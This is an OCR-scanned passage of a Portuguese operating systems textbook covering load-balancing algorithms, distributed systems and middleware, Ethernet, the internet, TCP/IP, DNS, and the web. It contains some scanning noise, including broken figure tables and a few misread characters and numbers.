arco representando o fluxo de mensagens entre dois 
processos. Matematicamente, o problema então se re- 
duz a encontrar uma maneira de dividir (isto é, cortar) 
o gráfico em k subgrafos disjuntos, sujeitos a determi- 
nadas restrições (por exemplo, exigências de memória 
e CPU totais inferiores a determinados limites para 
cada subgrafo). Para cada solução que atende às res- 
trições, arcos que se encontram inteiramente dentro de 
um único subgrafo representam a comunicação intra- 
máquina e podem ser ignorados. Arcos que vão de um 
subgrafo a outro representam o tráfego de rede. A meta 
é então encontrar a divisão que minimize o tráfego de 
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rede enquanto atendendo todas as restrições. Como um 
exemplo, a Figura 8.24 mostra um sistema com nove 
processos, A até J, com cada arco rotulado com a carga 
de comunicação média entre esses dois processos (por 
exemplo, em Mbps). 

Na Figura 8.24(a), dividimos o grafo com os pro- 
cessos 4, E e G no nó 1, processos B, F e H no nó 2, e 
processos C, D e Jno nó 3. O tráfego total da rede é a 
soma dos arcos intersecionados pelos cortes (as linhas 
tracejadas), ou 30 unidades. Na Figura 8.24(b) temos 
uma divisão diferente que tem apenas 28 unidades de 
tráfego de rede. Presumindo que ela atende a todas as 
restrições de memória e CPU, essa é uma escolha me- 
lhor, pois exige menos comunicação. 

Intuitivamente, o que estamos fazendo é procurar 
por aglomerados fortemente acoplados (alto fluxo de 
tráfego intragrupo), mas que interajam pouco com ou- 
tros aglomerados (baixo fluxo de tráfego intergrupo). 
Alguns dos primeiros estudos discutindo o problema fo- 
ram realizados por Chow e Abraham (1982), Lo (1984) 
e Stone e Bokhari (1978). 


Um algoritmo heurístico distribuído iniciado pelo 
emissor 


Agora vamos examinar alguns algoritmos distribui- 
dos. Um algoritmo diz que quando um processo é criado, 
ele executa no nó que o criou, a não ser que o nó esteja 
sobrecarregado. A métrica usada para comprovar a sobre- 
carga pode envolver um número de processos grande de- 
mais, um conjunto de trabalho grande demais, ou alguma 
outra. Se ele estiver sobrecarregado, o nó seleciona outro 
nó ao acaso e pergunta a ele qual é a sua carga (usando a 
mesma métrica). Se a carga do nó sondado estiver abaixo 
do valor limite, o novo processo é enviado para lá (EA- 
GER et al, 1986). Se não estiver, outra maquina é escolhi- 
da para a sondagem. A sondagem não segue para sempre. 





Processo 


(a) 


(b) 


Se nenhum anfitrião adequado for encontrado dentro de 
N sondagens, o algoritmo termina e o processo executa 
na máquina de origem. A ideia é para os nós pesadamente 
carregados tentar se livrar do trabalho em excesso, como 
mostrado na Figura 8.25(a), representando um balancea- 
mento de carga iniciado pelo emissor. 

Eager et al. construíram um modelo analítico desse 
algoritmo baseado em filas. Usando esse modelo, fi- 
cou estabelecido que o algoritmo comporta-se bem e é 
estável sob uma ampla gama de parâmetros, incluindo 
varios valores de limiares, custos de transferência e li- 
mites de sondagem. 

Mesmo assim, deve ser observado que em condições 
de carga pesada, todas as máquinas enviarão sondas cons- 
tantemente para outras máquinas em uma tentativa fútil de 
encontrar uma que esteja disposta a aceitar mais trabalho. 
Poucos processos serão transferidos, mas uma sobrecarga 
considerável poderá ser incorrida em tentativas de fazê-lo. 


Algoritmo heurístico distribuído iniciado pelo 
receptor 


Um algoritmo complementar ao discutido anterior- 
mente, que é iniciado por um emissor sobrecarregado, é 
iniciado por um receptor com pouca carga, como mos- 
trado na Figura 8.25(b). Com esse algoritmo, sempre 
que um processo termina, o sistema confere para ver 
se ele tem trabalho suficiente. Se não tiver, ele escolhe 
alguma máquina ao acaso e solicita trabalho a ela. Se 
essa maquina não tem nada a oferecer, uma segunda, e 
então uma terceira máquina são solicitadas. Se nenhum 
trabalho for encontrado com N sondagens, o nó para 
temporariamente de pedir, realiza qualquer trabalho que 
ele tenha em fila e tenta novamente quando o próximo 
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processo terminar. Se nenhum trabalho estiver dispo- 
nível, a máquina fica ociosa. Após algum intervalo de 
tempo fixo, ela começa a sondar novamente. 

Uma vantagem desse algoritmo é que ele não colo- 
ca uma carga extra sobre o sistema em momentos cri- 
ticos. O algoritmo iniciado pelo emissor faz um grande 
número de sondagens precisamente quando o sistema 
menos pode tolerá-las — isto é, quando ele está pesada- 
mente carregado. Com o algoritmo iniciado pelo recep- 
tor, quando o sistema estiver pesadamente carregado, 
a chance de uma máquina ter trabalho insuficiente é 
pequena. No entanto, quando isso acontecer, será fácil 
encontrar trabalho para fazer. É claro, quando há pouco 
trabalho a fazer, o algoritmo iniciado pelo receptor cria 
um tráfego de sondagem considerável à medida que to- 
das as máquinas sem trabalho caçam desesperadamente 
por trabalho para fazer. No entanto, é muito melhor ter 
uma sobrecarga extra quando o sistema não está sobre- 
carregado do que quando ele está. 

Também é possível combinar ambos os algoritmos e 
fazer as máquinas tentarem se livrar do trabalho quando 
elas têm demais, e tentarem adquirir trabalho quando 
elas não têm o suficiente. Além disso, máquinas podem 
às vezes fazer melhor do que sondagens aleatórias man- 
tendo um histórico de sondagens passadas para determi- 
nar se alguma máquina vive cronicamente subcarregada 
ou sobrecarregada. Uma dessas pode ser tentada primei- 
ro, dependendo de o iniciador estar tentando livrar-se do 
trabalho ou adquiri-lo. 


8.3 Sistemas distribuídos 


Tendo agora completado nosso estudo de multinú- 
cleos, multiprocessadores e multicomputadores, estamos 


aeii: W: (a) Um nó sobrecarregado procurando por um nó menos carregado para o qual possa repassar processos. (b) Um nó 
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prontos para nos voltar ao Ultimo tipo de sistema de 
múltiplos processadores, o sistema distribuído. Esses 
sistemas são similares a multicomputadores pelo fato de 
que cada nó tem sua própria memória privada, sem uma 
memória física compartilhada no sistema. No entanto, 
sistemas distribuídos são ainda mais fracamente acopla- 
dos do que multicomputadores. 

Para começo de conversa, cada nó de um multicom- 
putador geralmente tem uma CPU, RAM, uma interface 
de rede e possivelmente um disco para paginação. Em 
comparação, cada nó em um sistema distribuído é um 
computador completo, com um complemento completo 
de periféricos. Em seguida, os nós de um multicompu- 
tador estão em geral em uma única sala, de maneira que 
eles podem se comunicar através de uma rede de alta 
velocidade dedicada, enquanto os nós de um sistema 
distribuído podem estar espalhados pelo mundo todo. 
Finalmente, todos os nós de um multicomputador exe- 
cutam o mesmo sistema operacional, compartilhando 
um único sistema de arquivos, e estão sob uma admi- 
nistração comum, enquanto os nós de um sistema distri- 
buído podem cada um executar um sistema operacional 
diferente, cada um dos quais tendo seu próprio sistema 
de arquivos, e estar sob uma administração diferente. 
Um exemplo típico de um multicomputador são 1.024 
nós em uma única sala em uma empresa ou universida- 
de trabalhando com, digamos, modelos farmacêuticos, 
enquanto um sistema distribuído típico consiste em mi- 
lhares de máquinas cooperando de maneira desagregada 
através da internet. A Figura 8.26 compara multiproces- 
sadores, multicomputadores e sistemas distribuídos nos 
pontos mencionados. 

Usando essas métricas, multicomputadores estão 
claramente no meio. Uma questão interessante é: “mul- 
ticomputadores são mais parecidos com multiprocessa- 
dores ou com sistemas distribuídos?”. Estranhamente, 
a resposta depende muito de sua perspectiva. Do ponto 


de vista técnico, multiprocessadores têm memória com- 
partilhada e os outros dois não. Essa diferença leva a 
diferentes modelos de programação e diferentes manei- 
ras de ver as coisas. No entanto, do ponto de vista das 
aplicações, multiprocessadores e multicomputadores 
são apenas grandes estantes com equipamentos em uma 
sala de máquinas. Ambos são usados para solucionar 
problemas computacionalmente intensivos, enquanto 
um sistema distribuído conectando computadores por 
toda a internet em geral está muito mais envolvido na 
comunicação do que na computação e é usado de ma- 
neira diferente. 

Até certo ponto, o acoplamento fraco dos compu- 
tadores em um sistema distribuído é ao mesmo tempo 
uma vantagem e uma desvantagem. É uma vantagem 
porque os computadores podem ser usados para uma 
ampla variedade de aplicações, mas também é uma des- 
vantagem, porque a programação dessas aplicações é 
difícil por causa da falta de qualquer modelo subjacente 
comum. 

Aplicações típicas da internet incluem acesso a 
computadores remotos (usando telnet, ssh e rlogin), 
acesso a informações remotas (usando a WWW — 
World Wide Web e o FTP — File Transfer Protocol 
— protocolo de transferência de arquivos), comuni- 
cação interpessoal (usando e-mail e programas de 
chat) e muitas aplicações emergentes (por exemplo, 
e-comércio, telemedicina e ensino a distância). O pro- 
blema com todas essas aplicações é que cada uma tem 
de reinventar a roda. Por exemplo, e-mail, FTP e a 
WWW, todos basicamente movem arquivos do ponto 
A para o ponto B, mas cada um tem sua própria ma- 
neira de fazê-lo, completa, com suas convenções de 
nomes, protocolos de transferência, técnicas de repli- 
cação e tudo mais. Embora muitos navegadores da web 
escondam essas diferenças do usuário médio, os me- 
canismos subjacentes são completamente diferentes. 


KEUTER Comparação de três tipos de sistemas com múltiplas CPUs. 
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Configuração do nó 
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CPU, RAM, interface de rede 


Computador completo 





Periféricos do nó 


Tudo compartilhado 
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Conjunto completo por nó 





Localização 
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Possivelmente espalhado pelo mundo 


Rede tradicional 





Sistemas operacionais 


Um, compartilhado 
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Possivelmente todos diferentes 
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Um, compartilhado 


Um, compartilhado 


Cada nó tem seu próprio 








Administração 





Uma organização 








Uma organização 








Várias organizações 








Escondê-los no nível da interface do usuário é como 
uma pessoa reservar uma viagem de Nova York para 
São Francisco em um site de viagens e só depois ficar 
sabendo se ela comprou uma passagem para um avião, 
trem ou ônibus. 

O que os sistemas distribuídos acrescentam à rede 
subjacente é algum paradigma comum (modelo) que 
proporciona uma maneira uniforme de ver o sistema 
como um todo. A intenção do sistema distribuído é 
transformar um monte de máquinas conectadas de ma- 
neira desagregada em um sistema coerente baseado em 
um conceito. Às vezes o paradigma é simples e às vezes 
ele é mais elaborado, mas a ideia é sempre fornecer algo 
que unifique o sistema. 

Um exemplo simples de um paradigma unificador 
em um contexto diferente é encontrado em UNIX, onde 
todos os dispositivos de E/S são feitos para parecerem 
arquivos. Ter teclados, impressoras e linhas seriais, to- 
dos operando da mesma maneira, com as mesmas pri- 
mitivas, torna mais fácil lidar com eles do que tê-los 
todos conceitualmente diferentes. 

Um método pelo qual um sistema distribuído pode 
alcançar alguma medida de uniformidade diante dife- 
rentes sistemas operacionais e hardware subjacente é ter 
uma camada de software sobre o sistema operacional. A 
camada, chamada de middleware, está ilustrada na Fi- 
gura 8.27. Essa camada fornece determinadas estruturas 
de dados e operações que permitem que os processos e 
usuários em máquinas distantes operem entre si de uma 
maneira consistente. 

De certa maneira, middleware é como o sistema ope- 
racional de um sistema distribuído. Essa é a razão de ele 
estar sendo discutido em um livro sobre sistemas ope- 
racionais. Por outro lado, ele não é realmente um sis- 
tema operacional, então a discussão não entrará muito 
em detalhes. Para um estudo compreensivo, de um livro 


Capítulo 8 SISTEMAS COM MÚLTIPLOS PROCESSADORES | 393 


inteiro sobre sistemas distribuidos, ver Sistemas distribu- 
idos (TANENBAUM e VAN STEEN, 2008). No restante 
deste capitulo, examinaremos rapidamente o hardware 
usado em um sistema distribuído (isto é, a rede de com- 
putadores subjacente), e seu software de comunicação 
(os protocolos de rede). Após isso, consideraremos uma 
série de paradigmas usados nesses sistemas. 


8.3.1 Hardware de rede 


Sistemas distribuídos são construídos sobre redes de 
computadores, então é necessária uma breve introdução 
para o assunto. As redes existem em duas variedades 
principais, LANs (Local Area Networks — redes lo- 
cais), que cobrem um prédio ou um campus e WANS 
(Wide Area Networks — redes de longa distância), 
que podem cobrir uma cidade inteira, um país inteiro, 
ou todo o mundo. O tipo mais importante de LAN é a 
Ethernet, então a examinaremos como um exemplo de 
LAN. Como nosso exemplo de WAN, examinaremos a 
internet, embora tecnicamente a internet não seja ape- 
nas uma rede, mas uma federação de milhares de redes 
separadas. No entanto, para os nossos propósitos, é su- 
ficiente pensá-la como uma WAN. 


Ethernet 


A Ethernet clássica, que é descrita no padrão IEEE 
Standard 802.3, consiste em um cabo coaxial ao qualuma 
série de computadores está ligada. O cabo é chamado de 
Ethernet, em referência ao éter luminoso (/uminiferous 
ether) através do qual acreditava-se antigamente que a 
radiação eletromagnética se propagava. (Quando o fisi- 
co britânico do século XIX James Clerk Maxwell des- 
cobriu que a radiação eletromagnética podia ser descrita 
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por uma equação de onda, os cientistas presumiram que 
o espaço devia estar cheio com algum elemento etéreo 
no qual a radiação estava se propagando. Apenas após 
o famoso experimento de Michelson-Morley em 1887, 
que fracassou em detectar o éter, os físicos perceberam 
que a radiação podia propagar-se no vácuo). 

Na primeiríssima versão da Ethernet, um computador 
era ligado ao cabo literalmente abrindo um buraco no 
meio do cabo e enfiando um fio que levava ao compu- 
tador. Esse conector era chamado de conector vampiro 
e está ilustrado simbolicamente na Figura 8.28(a). Esses 
conectores eram difíceis de acertar direito, então não le- 
vou muito tempo para que conectores apropriados fossem 
usados. Mesmo assim, eletricamente, todos os computa- 
dores eram conectados como se os cabos em suas placas 
de interface de rede estivessem soldados juntos. 

Com muitos computadores conectados ao mesmo 
cabo, um protocolo é necessário para evitar o caos. Para 
enviar um pacote na Ethernet, um computador primeiro 
escuta o cabo para ver se algum outro computador está 
transmitindo no momento. Se não estiver, ele começa 
a transmitir um pacote, que consiste em um cabeçalho 
curto seguido de O a 1.500 bytes de informação. Se o 
cabo estiver em uso, o computador apenas espera até a 
transmissão atual terminar, então ele começa a enviar. 

Se dois computadores começam a transmitir simul- 
taneamente, resulta em uma colisão, que ambos detec- 
tam. Ambos respondem terminando suas transmissões, 
esperando por um tempo aleatório entre 0 e T us e então 
iniciando de novo. Se outra colisão ocorrer, todos os 
computadores esperam um tempo aleatório no intervalo 
de 0 a 27 us, e então tentam novamente. Em cada coli- 
são seguinte, o intervalo de espera máximo é dobrado, 
reduzindo a chance de mais colisões. Esse algoritmo 
é conhecido como recuo exponencial binário. Nós o 
mencionamos anteriormente para reduzir a sobrecarga 
na espera por variáveis de travamento. 

Uma rede Ethernet tem um comprimento de cabo má- 
ximo e também um número máximo de computadores 


ale WA (a) Ethernet clássica. (b) Ethernet usando comutadores. 
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que podem ser conectadas a ela. Para superar qualquer 
um desses limites, um prédio grande ou campus podem 
ser ligados a várias Ethernets, que são então conecta- 
das por dispositivos chamados de pontes. Uma ponte 
é um dispositivo que permite o tráfego passar de uma 
Ethernet para outra quando a fonte está de um lado e o 
destino do outro. 

Para evitar o problema de colisões, Ethernets mo- 
dernas usam comutadores, como mostrado na Figura 
8.28(b). Cada comutador tem algum número de portas, 
às quais podem ser ligados computadores, uma Ether- 
net, ou outro comutador. Quando um pacote evita com 
sucesso todas as colisões e chega ao comutador, ele é ar- 
mazenado em um buffer e enviado pela porta que acessa 
a máquina destinatária. Ao dar a cada computador a sua 
própria porta, todas as colisões podem ser eliminadas, 
ao custo de comutadores maiores. Um meio-termo, com 
apenas alguns computadores por porta, também é possi- 
vel. Na Figura 8.28(b), uma Ethernet clássica com múl- 
tiplos computadores conectados a um cabo por meio de 
conectores vampiros é conectada a uma das portas do 
comutador. 


A internet 


A internet evoluiu da ARPANET, uma rede experi- 
mental de comutação de pacotes fundada pela Agência 
de Projetos de Pesquisa Avançados do Departamento de 
Defesa dos Estados Unidos. Ela foi colocada em fun- 
cionamento em dezembro de 1969 com três computa- 
dores na Califórnia e um em Utah. Ela foi projetada no 
auge da Guerra Fria para ser uma rede altamente tole- 
rante a falhas que continuaria a transmitir tráfego mili- 
tar mesmo no evento de ataques nucleares diretos sobre 
múltiplas partes da rede ao automaticamente desviar o 
tráfego das máquinas atingidas. 

A ARPANET cresceu rapidamente na década de 
1970, por fim compreendendo centenas de computado- 
res. Então uma rede de pacotes via rádio, uma rede de 
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satélites e por fim milhares de Ethernets foram ligadas a 
ela, levando à federação de redes que conhecemos hoje 
como internet. 

A internet consiste em dois tipos de computadores, 
hospedeiros (hosts) e roteadores. Hospedeiros são PCs, 
notebooks, smartphones, servidores, computadores de 
grande porte e outros computadores de propriedade de 
indivíduos ou companhias que querem conectar-se à 
internet. Roteadores são computadores de comutação 
especializados que aceitam pacotes que chegam de uma 
das muitas linhas de entrada e os enviam para fora ao 
longo das muitas linhas de saída. Um roteador é simi- 
lar ao comutador da Figura 8.28(b), mas também difere 
dele de maneiras que não abordaremos aqui. Roteado- 
res são conectados em grandes redes, com cada rotea- 
dor tendo cabos ou fibras para muitos outros roteadores 
e hospedeiros. Grandes redes de roteadores nacionais 
ou mundiais são operadas por companhias telefônicas e 
ISPs (Internet Service Providers — provedores de ser- 
viços de internet) para seus clientes. 

A Figura 8.29 mostra uma porção da internet. No 
topo temos um dos backbones (“espinha dorsal”), nor- 
malmente operado por um operador de backbone. Ele 
consiste em uma série de roteadores conectados por 
fibras óticas de alta largura de banda, com backbones 
operados por outras companhias telefônicas (competi- 
doras). Em geral, nenhum hospedeiro se conecta dire- 
tamente ao backbone, a não ser máquinas de testes e 
manutenção operadas pela companhia telefônica. 
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Ligados aos roteadores dos backbones por cone- 
xões de fibra ótica de velocidade média, estão as redes 
regionais e roteadores nos ISPs. As Ethernets corpo- 
rativas, por sua vez, cada uma tem um roteador nela e 
esses estão conectados a roteadores de rede regionais. 
Roteadores em ISPs estão conectados a bancos mo- 
dernos usados pelos clientes dos ISPs. Dessa maneira, 
cada hospedeiro na internet tem pelo menos um cami- 
nho, e muitas vezes muitos caminhos, para cada outro 
hospedeiro. 

Todo tráfego na internet é enviado na forma de pa- 
cotes. Cada pacote carrega dentro de si seu endereço 
de destino, e esse endereço é usado para o roteamento. 
Quando um pacote chega a um roteador, este extrai o 
endereço de destino e o compara (parte dele) em uma 
tabela para encontrar para qual linha de saída enviar o 
pacote e assim para qual roteador. Esse procedimento 
é repetido até o pacote chegar ao hospedeiro de desti- 
no. As tabelas de roteamento são altamente dinâmicas e 
atualizadas continuamente à medida que os roteadores e 
as conexões caem e voltam, assim como quando as con- 
dições de tráfego mudam. Os algoritmos de roteamen- 
to foram intensamente estudados e modificados com o 
passar dos anos. 


8.3.2 Serviços de rede e protocolos 


Todas as redes de computador fornecem determi- 
nados serviços para os seus usuários (hospedeiros e 
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processos), que elas implementam usando determina- 
das regras a respeito de trocas de mensagens legais. A 
seguir apresentaremos uma breve introdução a esses 
tópicos. 


Serviços de rede 


Redes de computadores fornecem serviços aos hos- 
pedeiros e processos utilizando-as. O serviço orientado 
à conexão utilizou o sistema telefônico como modelo. 
Para falar com alguém, você pega o telefone, tecla o 
número, fala e desliga. De modo similar, para usar um 
serviço de rede orientado à conexão, o usuário do ser- 
viço primeiro estabelece uma conexão, usa a conexão 
e então a libera. O aspecto essencial de uma conexão é 
que ela atua como uma tubulação: o emissor empurra 
objetos (bits) em uma extremidade, e o receptor os cole- 
ta na mesma ordem na outra extremidade. 

Em comparação, o serviço sem conexão utilizou o 
sistema postal como modelo. Cada mensagem (carta) 
carrega o endereço de destino completo, e cada uma 
é roteada através do sistema independente de todas as 
outras. Em geral, quando duas mensagens são enviadas 
para o mesmo destino, a primeira enviada será a pri- 
meira a chegar. No entanto, é possível que a primeira 
enviada possa ser atrasada de maneira que a segunda 
chegue primeiro. Com um serviço orientado à conexão 
isso é impossível. 

Cada serviço pode ser caracterizado por uma qua- 
lidade de serviço. Alguns serviços são confiáveis no 
sentido de que eles jamais perdem dados. Normalmen- 
te, um serviço confiável é implementado fazendo que o 
receptor confirme o recebimento de cada mensagem en- 
viando de volta um pacote de confirmação para que o 
emissor tenha certeza de que ela chegou. O processo de 
confirmação gera sobrecarga e atrasos, que são necessá- 
rios para detectar a perda de pacotes, mas que tornam as 
coisas mais lentas. 

Uma situação típica na qual um serviço orientado 
à conexão confiável é apropriado é a transferência de 
arquivos. O proprietário do arquivo quer ter certeza de 
que todos os bits cheguem corretamente e na mesma 
ordem em que foram enviados. Pouquíssimos clientes 
de transferência de arquivos prefeririam um serviço que 
ocasionalmente embaralha ou perde alguns bits, mesmo 
que ele seja muito mais rápido. 

O serviço orientado à conexão confiável tem duas 
variações relativamente menores: sequências de men- 
sagens e fluxos de bytes. No primeiro caso, os limites 
da mensagem são preservados. Quando duas mensa- 
gens de 1 KB são enviadas, elas chegam como duas 


mensagens de 1 KB, jamais como uma mensagem de 
2 KB. No segundo caso, a conexão é apenas um fluxo de 
bytes, sem limites entre mensagens. Quando 2 K bytes 
chegam ao receptor, não há como dizer se eles foram 
enviados como uma mensagem de 2 KB, duas mensa- 
gens de 1 KB, 2.048 mensagens de 1 byte, ou algo mais. 
Se as páginas de um livro são enviadas por uma rede 
para um tipógrafo como mensagens separadas, talvez 
seja importante preservar os limites das mensagens. Por 
outro lado, com um terminal conectado a um sistema de 
servidor remoto, um fluxo de bytes do terminal para o 
computador é tudo o que é necessário. Não há limites 
entre mensagens aqui. 

Para algumas aplicações, os atrasos introduzidos pe- 
las confirmações são inaceitáveis. Uma dessas aplica- 
ções é o tráfego de voz digitalizado. É preferível para os 
usuários de telefone ouvir um pouco de ruído na linha 
ou uma palavra embaralhada de vez em quando do que 
introduzir um atraso para esperar por confirmações. 

Nem todas as aplicações exigem conexões. Por 
exemplo, para testar a rede, tudo o que é necessário é 
uma maneira de enviar um pacote que tenha uma alta 
probabilidade de chegada, mas nenhuma garantia. Um 
serviço não confiável (isto é, sem confirmação) sem co- 
nexão é muitas vezes chamado de um serviço de data- 
grama, em analogia com o serviço de telegrama, que 
também não fornece uma confirmação de volta para o 
emissor. 

Em outras situações, a conveniência de não ter de 
estabelecer uma conexão para enviar uma mensagem 
curta é desejada, mas a confiabilidade é essencial. O 
serviço datagrama com confirmação pode ser forne- 
cido para essas aplicações. Ele funciona como enviar 
uma carta registrada e solicitar um recibo de retorno. 
Quando o recibo retorna, o emissor tem absolutamente 
certeza de que a carta foi entregue para a parte intencio- 
nada e não perdida ao longo do caminho. 

Ainda outro serviço é o serviço de solicitação-ré- 
plica. Nele o emissor transmite um único datagrama 
contendo uma solicitação, e a réplica contém a respos- 
ta. Por exemplo, uma pesquisa na biblioteca local per- 
guntando onde o uigur é falado cai nessa categoria. A 
solicitação-réplica é em geral usada para implementar a 
comunicação no modelo cliente-servidor: o cliente emi- 
te uma solicitação e o servidor responde a ela. A Figura 
8.30 resume os tipos de serviços discutidos. 


Protocolos de rede 


Todas as redes têm regras altamente especializadas 
para quais mensagens podem ser enviadas e respostas 
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podem ser retornadas em resposta a essas mensagens. 
Por exemplo, em determinadas circunstâncias, como 
transferência de arquivos, quando uma mensagem é en- 
viada de um remetente para um destinatário, é exigido 
do destinatário que ele envie uma confirmação de volta 
indicando o recebimento correto da mensagem. Em ou- 
tras, como telefonia digital, esse tipo de confirmação 
não é esperada. O conjunto de regras pelo qual compu- 
tadores particulares comunicam-se é chamado de proto- 
colo. Existem muitos protocolos, incluindo protocolos 
do tipo roteador a roteador, hospedeiro a hospedeiro e 
outros. Para um tratamento aprofundado das redes de 
computadores e seus protocolos, ver Redes de computa- 
dores (TANENBAUM e WETHERALL, 2011). 

Todas as redes modernas usam o que é chamado de 
pilha de protocolos para empilhar diferentes protoco- 
los no topo um do outro. Em cada camada, diferentes 
questões são tratadas. Por exemplo, no nível mais baixo 
protocolos definem como dizer em que parte do fluxo 
de bits um pacote começa e termina. Em um nivel mais 
alto, protocolos lidam com como rotear pacotes atra- 
vés de redes complexas da origem ao destino. E em um 
nível ainda mais alto, eles se certificam de que todos 
os pacotes em uma mensagem de múltiplos pacotes te- 
nham chegado corretamente e na ordem certa. 

Tendo em vista que a maioria dos sistemas distribui- 
dos usa a internet como base, os protocolos-chave que 
esses sistemas usam são os dois principais da internet: 
IP e TCP. IP (Internet Protocol — protocolo da inter- 
net) é um protocolo de datagrama no qual um emissor 
injeta um datagrama de até 64 KB na rede e espera que 
ele chegue. Nenhuma garantia é dada. O datagrama 
pode ser fragmentado em pacotes menores à medida 
que ele passa pela internet. Esses pacotes viajam inde- 
pendentemente, possivelmente ao longo de rotas dife- 
rentes. Quando todas as partes chegam ao destino, elas 
são montadas na ordem correta e entregues. 


Duas versões de IP estão em uso, v4 e v6. No mo- 
mento, v4 ainda domina, então vamos descrevê-lo aqui, 
mas o vó está em ascensão. Cada pacote v4 começa com 
um cabeçalho de 40 bytes que contém um endereço de 
origem de 32 bits e um endereço de destino de 32 bits 
entre outros campos. Esses são chamados de endereços 
IP e formam a base do roteamento da internet. Eles são 
convencionalmente escritos como quatro números de- 
cimais na faixa de 0-225 separados por pontos, como 
em 192.31.231.65. Quando um pacote chega a um ro- 
teador, este extrai o endereço de destino IP e o usa para 
o roteamento. 

Já que datagramas de IP não recebem confirmações, 
o IP sozinho não é suficiente para uma comunicação 
confiável na internet. Para fornecer uma comunicação 
confiável, outro protocolo, TCP (Transmission Con- 
trol Protocol — protocolo de controle de transmissão), 
geralmente é colocado sobre o IP. O TCP emprega o IP 
para fornecer fluxos orientados à conexão. Para usar o 
TCP, um processo primeiro estabelece uma conexão a 
um processo remoto. O processo que está sendo requi- 
sitado é especificado pelo endereço de IP de uma má- 
quina e um número de porta naquela máquina, a quem 
os processos interessados em receber conexões ouvem. 
Uma vez que isso tenha sido feito, ele simplesmente en- 
via bytes para a conexão, com garantia de que sairão 
do outro lado ilesos e na ordem correta. A implemen- 
tação do TCP consegue essa garantia usando números 
de sequências, somas de verificação e retransmissões 
de pacotes incorretamente recebidos. Tudo isso é trans- 
parente para os processos enviando e recebendo dados. 
Eles simplesmente veem uma comunicação entre pro- 
cessos como confiável, como um pipe do UNIX. 

Para ver como todos esses protocolos interagem, con- 
sidere o caso mais simples de uma mensagem muito pe- 
quena que não precisa ser fragmentada em nível algum. 
O hospedeiro está em uma Ethernet conectada à internet. 


398] | SISTEMAS OPERACIONAIS MODERNOS 


O que acontece exatamente? O processo usuario gera a 
mensagem e faz uma chamada de sistema para envia-la 
em uma conexão TCP previamente estabelecida. A pilha 
de protocolos do núcleo acrescenta um cabeçalho TCP e 
então um cabeçalho de IP na frente da mensagem. De- 
pois ela vai para o driver da Ethernet, que acrescenta um 
cabeçalho de Ethernet direcionando o pacote para o rote- 
ador na Ethernet. Este então injeta o pacote na internet, 
como descrito na Figura 8.31. 

Para estabelecer uma conexão com um hospedeiro 
remoto (ou mesmo para enviar um datagrama), é ne- 
cessário saber o seu endereço IP. Visto que gerenciar 
listas de endereços IP de 32 bits é inconveniente para as 
pessoas, um esquema chamado DNS (Domain Name 
System — serviço de nomes de domínio) foi inventado 
como um banco de dados que mapeia nomes de hos- 
pedeiros em ASCII em seus endereços IP. Desse modo 
é possível usar o nome DNS starcs.vu.nl em vez do 
endereço IP correspondente 130.37.24.6. Nomes DNS 
são comumente conhecidos porque os endereços de e- 
-mail da internet assumem a forma nome-do-usudrio@ 
nome-do-hospedeiro-no-DNS. Esse sistema de nomea- 
ção permite que o programa de e-mail do hospedeiro 
emissor procure o endereço IP do hospedeiro destinatá- 
rio no banco de dados do DNS, estabeleça uma conexão 
TCP com o processo servidor de e-mail (mail daemon) 
ali e envie a mensagem como um arquivo. O nome-do- 
-usuário é enviado juntamente para identificar em qual 
caixa de correio colocar a mensagem. 


8.3.3 Middleware baseado em documentos 


Agora que temos algum conhecimento sobre redes 
e protocolos, podemos começar a abordar diferentes 
camadas de middleware que podem sobrepor-se à rede 
básica para produzir um paradigma consistente para 
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aplicações e usuários. Começaremos com um exemplo 
simples, mas bastante conhecido: a World Wide Web. 
A web foi inventada por Tim Berners-Lee no CERN, o 
Centro de Pesquisa Nuclear Europeu, em 1989, e desde 
então espalhou-se como um incêndio mundo afora. 

O paradigma original por trás da web era bastante 
simples: cada computador pode deter um ou mais do- 
cumentos, chamados de páginas da web. Cada página 
da web consiste em texto, imagens, ícones, sons, filmes 
e assim por diante, assim como hyperlinks (ponteiros) 
para outras páginas. Quando um usuário solicita uma 
página da web usando um programa chamado de na- 
vegador da web, a página é exibida na tela. O clique 
em um link faz que a página atual seja substituída na 
tela pela página apontada. Embora muitos “adornos” 
tenham sido recentemente acrescentados à web, o pa- 
radigma subjacente ainda está claramente presente: 
a web é um grande grafo dirigido de documentos que 
pode apontar para outros documentos, como mostrado 
na Figura 8.32. 

Cada página da web tem um endereço único, cha- 
mado de URL (Uniform Resource Locator — loca- 
lizador uniforme de recursos), da forma protocolo:// 
nome-no-DNS/nome-do-arquivo. O protocolo é geral- 
mente o http (Hyper Text Transfer Protocol — proto- 
colo de transferência de hipertexto), mas também existe 
o ftp e outros. Depois, vem o nome no DNS do hos- 
pedeiro contendo o arquivo. Por fim, há um nome de 
arquivo local dizendo qual arquivo é necessário. Desse 
modo, um URL especifica apenas um único arquivo no 
mundo todo. 

A maneira como o sistema todo se mantém unido 
funciona da seguinte forma: a web é em essência um 
sistema cliente-servidor, com o usuário como o clien- 
te e o site da web como o servidor. Quando o usuário 
fornece o navegador com um URL, seja digitando-o ou 
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clicando em um hyperlink na página atual, o navegador 
dá determinados passos para buscar a página solicitada. 
Como um simples exemplo, suponha que o URL forne- 
cido seja http:/www.minix3.org/getting-started/index. 
html. O navegador então dá os passos a seguir para ob- 
ter a página: 


1. O navegador pede ao DNS o endereço IP de www. 
minix3.org. 

2. DNS responde com 66.147.238.215. 

3. O navegador abre uma conexão TCP com a porta 
80 em 66.147.238.215. 

4. Ele então envia uma solicitação para o arquivo 
getting-started/index.html. 

5. O servidor www.minix3.org envia o arquivo get- 
ting-started/index.html. 

6. O navegador exibe o texto todo em getting-star- 
ted/index.html. 

7. Enquanto isso, o navegador busca e exibe todas 
as imagens na página. 

8. A conexão TCP é liberada. 


De modo geral, essa é a base da web e seu funciona- 
mento. Muitas outras características desde então foram 
acrescentadas à web básica, incluindo planilhas de esti- 
los (style sheets), páginas da web dinâmicas que podem 
ser geradas em tempo de execução, páginas da web que 
contêm pequenos programas ou scripts que executam 
na máquina-cliente e mais, porém elas estão fora do es- 
copo desta discussão. 


8.3.4 Middleware baseado no sistema de arquivos 


A ideia básica por trás da web é fazer que um sistema 
distribuído pareça uma coleção gigante de documentos 
interligados por hyperlinks. Uma segunda abordagem 
é fazer um sistema distribuído parecer um enorme 
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sistema de arquivos. Nesta seção examinaremos algu- 
mas das questões envolvidas no projeto de um sistema 
de arquivos mundial. 

Usar um modelo de sistema de arquivos para um sis- 
tema distribuído significa que há um único sistema de 
arquivos global, com usuários mundo afora capazes de 
ler e escrever arquivos para os quais eles têm autoriza- 
